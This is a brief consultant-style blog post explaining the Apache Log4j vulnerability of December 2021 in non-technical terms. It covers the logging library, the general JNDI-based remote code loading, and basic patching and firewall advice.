In case you haven’t heard, a nightmare occurred just before the holidays kicked in. Apache’s Log4j vulnerability was discovered on December 10, 2021, and has been dubbed as one of the most catastrophic vulnerabilities on the internet. Hackers have used the flaw to target more than 40% of business networks globally. Since its discovery, approximately one-third of all web servers globally have been affected. Twitter, Amazon, Microsoft, Apple, IBM, Oracle, Cisco, and Minecraft, are just some of the technology and industry behemoths running the popular software code that has exposed hundreds of millions of devices.
As more businesses scramble to patch the issue, it’s vital to understand just what this Log4j vulnerability is and what are the next steps to take to protect yourself.
What Is Log4j?
First, let’s talk about Log4j. Log4j is a Java-based open-source project developed by the Apache Software Foundation. It runs on different platforms such as macOS, Windows, and Linux.
The open-source software includes an integrated “log” or record of activities — similar to a diary — that software developers may use to debug issues or track data within their systems. According to cybersecurity specialists, the “logging library” has expanded to all corners of the internet because it’s easy to use and free. This library is used by the vast majority of web services worldwide, which means that most web services are vulnerable to attack.
According to cybersecurity analysts, the breach leaves a list of essential infrastructure operations vulnerable to infiltration, including power, energy, food, communications, manufacturing, and water.
This vulnerable piece of code appears everywhere. It is ingrained in our children’s video games and the infrastructure we use, such as cloud technology.
How Does Log4j Work?
According to attack research, this new zero-day vulnerability in the Apache Log4j logging application has made it easy for people to get into the computer and do things remotely. Security experts say that hackers can use this flaw in the Java logging library to put text into log messages that load code from a remote server. Attackers can also use the Java Naming and Directory Interface (JNDI) to run malware on the server they’re trying to attack. This interface connects the server’s to a number of services, including Lightweight Directory Access Protocol (LDAP), Domain Name Service (DNS), and Java’s Remote Interface (RMI). People will then abuse LDAP, DNS, RMI and URLs by redirecting them to an external server.
Moreover, the real issue with a Log4j attack is that attackers know that patches are out there, and the most vulnerable systems are getting them as quickly as possible. This means they can’t plan their attack very carefully, and they’re much more likely to install or copy code that will stay on the computer after it’s been compromised. As soon as the dormant code is activated, some of the more sophisticated attacks will start to happen.
What Can You Do To Protect Yourself From The Log4J Vulnerability?
Thankfully, the fixes, called “patches,” and technical support have been made available to a lot of people. The Apache Software Foundation released new versions of its tool. Microsoft has asked customers to check with software application providers to make sure they’re using the Java programming language.
Companies should look at their internet-facing programs that use Log4j, respond to alerts from these devices, and install a firewall with automatic updates.
For people who can’t fix the problem right away, there’s a free tool, a “vaccine” that can keep intruders away for a while.
Lastly, people should keep an eye out for updates on their devices, software, and apps as companies work to fix flaws in them.
If you are concerned about any of the software you run or are simply unsure it’s critical that you get this checked to minimise any risk to your business. Cyber Threats are a continuing challenge even without these types of vulnerabilities. Reach out to me if you are concerned about your systems or would like to discuss your Cyber Security approach.